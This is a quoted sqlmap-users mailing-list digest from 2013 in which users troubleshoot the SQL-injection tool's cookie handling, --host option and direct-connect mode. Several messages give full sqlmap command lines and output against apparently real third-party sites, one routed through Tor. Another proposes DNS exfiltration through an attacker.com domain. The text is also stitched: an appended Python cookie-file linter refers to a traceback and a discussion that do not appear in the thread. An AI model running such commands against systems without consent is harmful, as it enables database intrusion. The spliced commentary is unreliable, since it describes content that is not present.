while eating my cookies file >>> ;-) >>> > > >>> > > > >>> > > > Also, please make sure that the cookie file contains proper >>> cookie(s) - domain name should be the same as a domain of target, cookie >>> needs to have a proper valid time, etc. >>> > > >>> > > see above. >>> > > >>> > > Cheers, >>> > > >>> > > Dirk >>> > > >>> > > > >>> > > > >>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote: >>> > > > >>> > > > Hi Miroslav, >>> > > > >>> > > > yes unfortunately. >>> > > > >>> > > > If I omit the cookie line in the request header completely, sqlmap >>> > > > seems to take the first cookie issued by the server with >>> set-cookie (and >>> > > > puts it silently in).
>>> > > > >>> > > > Cheers, >>> > > > >>> > > > Dirk >>> > > > >>> > > > >>> > > > >>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote: >>> > > > > Hi. >>> > > > > >>> > > > > And this is also happening if you are skipping "Cookie: >>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request? >>> > > > > >>> > > > > Kind regards, >>> > > > > Miroslav Stampar >>> > > > > >>> > > > > >>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote: >>> > > > > >>> > > > > >>> > > > > Hi folks, >>> > > > > >>> > > > > .... that doesn't work for me. It always uses the cookie supplied >>> > > > > (below in $REQUEST, or if I omit the line in $REQUEST the one >>> > > > > from the 1st server reply is being used) >>> > > > > >>> > > > > So what is wrong in here: >>> > > > > >>> > > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce >>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \ >>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \ >>> > > > > --level=2 --risk=2 -r $REQUEST >>> > > > > >>> > > > > The content of the file $REQUEST is: >>> > > > > >>> > > > > POST <URL> HTTP/1.1 >>> > > > > Host: <HOST> >>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) >>> AppleWebKit/525.13 (KHTML, like Gecko) >>> > > > > Chrome/0.2.149.6 Safari/525.13 >>> > > > > Accept: >>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >>> > > > > Accept-Language: en-US,en;q=0.5 >>> > > > > Accept-Encoding: gzip, deflate >>> > > > > Referer: <Referer> >>> > > > > Cookie:
JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7 >>> > > > > Connection: keep-alive >>> > > > > Content-Type: application/x-www-form-urlencoded >>> > > > > Content-Length: 67 >>> > > > > >>> > > > > <abunchofpostparams> >>> > > > > >>> > > > > >>> > > > > No hints that cookie-file is not in correct format (I've been >>> through this, >>> > > > > at least I think I so ;) ). >>> > > > > >>> > > > > Any insight would be much appreciated. >>> > > > > >>> > > > > >>> > > > > Cheers, >>> > > > > >>> > > > > Dirk >>> > > > > >>> > > > > >>> > > > >
>>> > > > > >>> > > > > >>> > > > > >>> > > > > >>> > > > > -- >>> > > > > Miroslav Stampar >>> > > > > http://about.me/stamparm >>> > > > >>> > > > >>> > > > >>> > > > >>> > > > -- >>> > > > Miroslav Stampar >>> > > > http://about.me/stamparm >>> > > >>> > > >>> > > >>> > > >>> > > -- >>> > > Miroslav Stampar >>> > > http://about.me/stamparm >>> > > >>> > > >>> > > >>> > > >>> > > -- >>> > > Miroslav Stampar >>> > > http://about.me/stamparm >>> > >>> > >>> > >>> > >>> > -- >>> > Miroslav Stampar >>> > http://about.me/stamparm >>> >>> >>> >>> >>> ------------------------------ >>> >>> Message: 6 >>> Date: Mon, 15 Apr 2013 14:01:01 -0700 >>> From: <co...@5i...> >>> Subject: [sqlmap-users] --host parameter >>> To: sql...@li... >>> Message-ID: >>> < >>> 201...@em... >>> > >>> >>> Content-Type: text/plain; charset="utf-8" >>> >>> Hello, >>> the --host doesn't work as expected, or I am doing something wrong: >>> >>> >>> this works as expected: >>> >>> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' >>> >>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >>> takeover tool >>> http://sqlmap.org >>> >>> [!] legal disclaimer: Usage of sqlmap for attacking targets without >>> prior mutual consent is illegal. It is the end user's responsibility to >>> obey all applicable local, state and federal laws. Developers assume no >>> liability and are not responsible for any misuse or damage caused by >>> this program >>> >>> [*] starting at 23:57:15 >>> >>> [23:57:15] [INFO] testing connection to the target URL >>> [23:57:15] [INFO] heuristics detected web page charset 'ascii' >>> [23:57:15] [INFO] testing if the target URL is stable.
This can take a >>> couple of seconds >>> [23:57:16] [INFO] target URL is stable >>> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic >>> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic >>> [23:57:16] [INFO] GET parameter 'id' is dynamic >>> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' >>> might be injectable (possible DBMS: 'MySQL') >>> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' >>> >>> >>> .... >>> >>> >>> this doesn't work as expected: >>> >>> ./sqlmap.py --host='i.csland.ro' >>> --url='http://188.240.236.15/index.php?id=0' >>> >>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >>> takeover tool >>> http://sqlmap.org >>> >>> [!] legal disclaimer: Usage of sqlmap for attacking targets without >>> prior mutual consent is illegal. It is the end user's responsibility to >>> obey all applicable local, state and federal laws. Developers assume no >>> liability and are not responsible for any misuse or damage caused by >>> this program >>> >>> [*] starting at 23:58:03 >>> >>> [23:58:03] [INFO] testing connection to the target URL >>> [23:58:03] [CRITICAL] page not found (404) >>> it is not recommended to continue in this kind of cases. Do you want to >>> quit and make sure that everything is set up properly? [Y/n] >>> [23:58:05] [WARNING] HTTP error codes detected during run: >>> >>> ............ >>> >>> >>> Of course i.csland.ro resolves to 188.240.236.15. Any idea? >>> >>> Thanks. >>> >>> >>> >>> >>> ------------------------------ >>> >>> Message: 7 >>> Date: Tue, 16 Apr 2013 09:12:05 +1100 >>> From: ???????? ?????? <vo...@s2...> >>> Subject: [sqlmap-users] Sqlmap and direct connect error >>> To: sql...@li... >>> Message-ID: <C59...@s2...> >>> Content-Type: text/plain; charset=us-ascii >>> >>> Hi! >>> >>> This bug detected if add direct param. 
>>> >>> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " >>> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor >>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >>> --exclude-sysdbs >>> >>> >>> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, >>> retry your run with the latest development version from the GitHub >>> repository. If the exception persists, please send by e-mail to ' >>> sql...@li...' or open a new issue at ' >>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >>> text and any information required to reproduce the bug. The developers will >>> try to reproduce the bug, fix it accordingly and get back to you. >>> sqlmap version: 1.0-dev-de99717 >>> Python version: 2.7.3 >>> Operating system: posix >>> Command line: sqlmap.py -d >>> **************************************************** -u >>> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor >>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >>> --exclude-sysdbs >>> Technique: None >>> Back-end DBMS: MySQL (identified) >>> Traceback (most recent call last): >>> File "sqlmap.py", line 87, in main >>> start() >>> File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in >>> start >>> action() >>> File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action >>> setHandler() >>> File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in >>> setHandler >>> conf.dbmsConnector.connect() >>> File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in >>> connect >>> self.connector = pymysql.connect(host=self.hostname, user=self.user, >>> passwd=self.password, db=self.db, port=self.port, >>> connect_timeout=conf.timeout, use_unicode=True) >>> File >>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", >>> line 93, in Connect >>> return Connection(*args, **kwargs) >>> File >>> 
"/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >>> line 584, in __init__ >>> self._connect() >>> File >>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >>> line 739, in _connect >>> sock.connect((self.host, self.port)) >>> File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in >>> connect >>> raise GeneralProxyError((5, _generalerrors[5])) >>> GeneralProxyError: (5, 'bad input') >>> >>> >>> >>> >>> ------------------------------ >>> >>> Message: 8 >>> Date: Tue, 16 Apr 2013 14:19:18 +0200 >>> From: Miroslav Stampar <mir...@gm...> >>> Subject: Re: [sqlmap-users] --host parameter >>> To: co...@5i... >>> Cc: SqlMap List <sql...@li...> >>> Message-ID: >>> <CA+...@ma...> >>> Content-Type: text/plain; charset="iso-8859-1" >>> >>> Hi. >>> >>> Thank you for your report and find it fixed with the latest commit [1]. >>> >>> Kind regards, >>> Miroslav Stampar >>> >>> [1] >>> >>> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86 >>> >>> >>> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote: >>> >>> > Hello, >>> > the --host doesn't work as expected, or I am doing something wrong: >>> > >>> > >>> > this works as expected: >>> > >>> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' >>> > >>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >>> > takeover tool >>> > http://sqlmap.org >>> > >>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without >>> > prior mutual consent is illegal. It is the end user's responsibility to >>> > obey all applicable local, state and federal laws. 
Developers assume no >>> > liability and are not responsible for any misuse or damage caused by >>> > this program >>> > >>> > [*] starting at 23:57:15 >>> > >>> > [23:57:15] [INFO] testing connection to the target URL >>> > [23:57:15] [INFO] heuristics detected web page charset 'ascii' >>> > [23:57:15] [INFO] testing if the target URL is stable. This can take a >>> > couple of seconds >>> > [23:57:16] [INFO] target URL is stable >>> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic >>> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic >>> > [23:57:16] [INFO] GET parameter 'id' is dynamic >>> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' >>> > might be injectable (possible DBMS: 'MySQL') >>> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' >>> > >>> > >>> > .... >>> > >>> > >>> > this doesn't work as expected: >>> > >>> > ./sqlmap.py --host='i.csland.ro' >>> > --url='http://188.240.236.15/index.php?id=0' >>> > >>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >>> > takeover tool >>> > http://sqlmap.org >>> > >>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without >>> > prior mutual consent is illegal. It is the end user's responsibility to >>> > obey all applicable local, state and federal laws. Developers assume no >>> > liability and are not responsible for any misuse or damage caused by >>> > this program >>> > >>> > [*] starting at 23:58:03 >>> > >>> > [23:58:03] [INFO] testing connection to the target URL >>> > [23:58:03] [CRITICAL] page not found (404) >>> > it is not recommended to continue in this kind of cases. Do you want to >>> > quit and make sure that everything is set up properly? [Y/n] >>> > [23:58:05] [WARNING] HTTP error codes detected during run: >>> > >>> > ............ >>> > >>> > >>> > Of course i.csland.ro resolves to 188.240.236.15. Any idea? >>> > >>> > Thanks. 
>>> > >>> > >>> > >>> > >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >>> ------------------------------ >>> >>> Message: 9 >>> Date: Tue, 16 Apr 2013 14:33:33 +0200 >>> From: Miroslav Stampar <mir...@gm...> >>> Subject: Re: [sqlmap-users] Sqlmap and direct connect error >>> To: ???????? ?????? <vo...@s2...> >>> Cc: SqlMap List <sql...@li...> >>> Message-ID: >>> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...> >>> Content-Type: text/plain; charset="koi8-r" >>> >>> Hi Vladimir. >>> >>> Find it "patched" with the latest commit [1]. Basically, those >>> combinations >>> should not be allowed (-d and --url; -d and --tor; etc.) and now we've >>> added new option validation checks for this kind of cases. >>> >>> Kind regards, >>> Miroslav Stampar >>> >>> [1] >>> >>> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a >>> >>> >>> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote: >>> >>> > Hi! >>> > >>> > This bug detected if add direct param.
>>> > >>> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " >>> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor >>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >>> > --exclude-sysdbs >>> > >>> > >>> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, >>> retry >>> > your run with the latest development version from the GitHub >>> repository. If >>> > the exception persists, please send by e-mail to ' >>> > sql...@li...' or open a new issue at ' >>> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following >>> > text and any information required to reproduce the bug. The developers >>> will >>> > try to reproduce the bug, fix it accordingly and get back to you. >>> > sqlmap version: 1.0-dev-de99717 >>> > Python version: 2.7.3 >>> > Operating system: posix >>> > Command line: sqlmap.py -d >>> > **************************************************** -u >>> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor >>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >>> > --exclude-sysdbs >>> > Technique: None >>> > Back-end DBMS: MySQL (identified) >>> > Traceback (most recent call last): >>> > File "sqlmap.py", line 87, in main >>> > start() >>> > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in >>> > start >>> > action() >>> > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in >>> action >>> > setHandler() >>> > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in >>> > setHandler >>> > conf.dbmsConnector.connect() >>> > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, >>> in >>> > connect >>> > self.connector = pymysql.connect(host=self.hostname, user=self.user, >>> > passwd=self.password, db=self.db, port=self.port, >>> > connect_timeout=conf.timeout, use_unicode=True) >>> > File >>> > >>>
"/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", >>> > line 93, in Connect >>> > return Connection(*args, **kwargs) >>> > File >>> > >>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >>> > line 584, in __init__ >>> > self._connect() >>> > File >>> > >>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >>> > line 739, in _connect >>> > sock.connect((self.host, self.port)) >>> > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in >>> > connect >>> > raise GeneralProxyError((5, _generalerrors[5])) >>> > GeneralProxyError: (5, 'bad input') >>> > >>> > >>> > >>> > >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >>> ------------------------------ >>> >>> Message: 10 >>> Date: Tue, 16 Apr 2013 23:26:39 +0200 >>> From: buawig <bu...@gm...> >>> Subject: [sqlmap-users] feature request: offline mode for >>> --dns-domain?
>>> To: SqlMap List <sql...@li...> >>> Message-ID: <516...@gm...> >>> Content-Type: text/plain; charset=UTF-8 >>> >>> -----BEGIN PGP SIGNED MESSAGE----- >>> Hash: SHA512 >>> >>> Hi, >>> >>> in cases where sqlmap is run against targets on internal networks it >>> would be great if one could tell sqlmap to simply proceed without >>> expecting incoming DNS requests, because sqlmap can not be executed >>> directly on the DNS server (which can't reach the target, but the >>> target can reach the DNS server). >>> >>> For me it would be enough to simply run something like >>> - -u ... --dns-domain=attacker.com --dns-port=0 >>> (--dns-port does not exist [yet]) >>> >>> to let sqlmap know that it doesn't need to start a DNS listener. >>> >>> I would then collect and decode the DNS queries on the DNS server >>> manually, but I could also envision running a second sqlmap instance >>> on the DNS server with --dns-domain (but without -u) doing that job. >>> >>> >>> >>> ------------------------------ >>> >>> Message: 11 >>> Date: Tue, 16 Apr 2013 23:24:23 +0200 >>> From: buawig <bua... [truncated message content] |
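The two cookie-file questions raised in the quoted --load-cookies messages (the `assert domain_specified == initial_dot` failure in the traceback, and whether an expiry of 0 means "session" or "expired") can be checked before a file is handed to any Netscape-format loader. The following is an added example, not part of the original thread and not sqlmap's or cookielib's code; the function names, the `zero_is_session` switch and the example.com sample data are assumptions made for illustration.

```python
import time

FIELDS = ("domain", "domain_specified", "path", "secure",
          "expires", "name", "value")

# Constructed sample (not from the thread): example.com hosts, made-up values.
SAMPLE = "\n".join([
    "# Netscape HTTP Cookie File",
    ".example.com\tTRUE\t/\tFALSE\t1429089794\tSRCHD\tAF=NOFORM",
    "www.example.com\tTRUE\t/app\tTRUE\t9999999999\tJSESSIONID\tCONSTRUCTED1",
    "www.example.com\tFALSE\t/app\tTRUE\t0\tJSESSIONID\tCONSTRUCTED2",
])
SAMPLE_NOW = 1366000000  # fixed "current time" (April 2013) for repeatable results


def lint_cookie_line(line, now=None, zero_is_session=True):
    """Check one data line; return (cookie dict or None, list of problems)."""
    now = time.time() if now is None else now
    parts = line.rstrip("\r\n").split("\t")
    if len(parts) != len(FIELDS):
        return None, ["expected 7 tab-separated fields, got %d" % len(parts)]
    cookie = dict(zip(FIELDS, parts))
    problems = []

    for flag in ("domain_specified", "secure"):
        if cookie[flag] not in ("TRUE", "FALSE"):
            problems.append("%s must be TRUE or FALSE" % flag)

    # Same condition as the assertion shown in the traceback:
    # the second column must be TRUE exactly when the domain starts with a dot.
    initial_dot = cookie["domain"].startswith(".")
    if (cookie["domain_specified"] == "TRUE") != initial_dot:
        problems.append("domain flag %s does not match leading dot in %r"
                        % (cookie["domain_specified"], cookie["domain"]))

    if not cookie["expires"].isdigit():
        problems.append("expires is not a UNIX timestamp")
        cookie["kind"] = "unknown"
    else:
        expires = int(cookie["expires"])
        if expires == 0 and zero_is_session:
            # wget --keep-session-cookies convention: 0 marks a session cookie.
            cookie["kind"] = "session"
        elif expires <= now:
            # Strict reading: any timestamp in the past (including 0) is expired.
            cookie["kind"] = "expired"
            problems.append("cookie expired")
        else:
            cookie["kind"] = "valid"
    return cookie, problems


def lint_cookie_file(text, now=None, zero_is_session=True):
    """Lint every data line; return [(line number, cookie, problems), ...]."""
    report = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue  # blank lines and comments carry no cookie
        cookie, problems = lint_cookie_line(line, now, zero_is_session)
        report.append((lineno, cookie, problems))
    return report


if __name__ == "__main__":
    for lineno, cookie, problems in lint_cookie_file(SAMPLE, now=SAMPLE_NOW):
        kind = cookie["kind"] if cookie else "unparsed"
        print("line %d: %s %s" % (lineno, kind, problems or "ok"))
```

Running it with `zero_is_session=False` reproduces the stricter reading in which a 0 expiry is reported as expired.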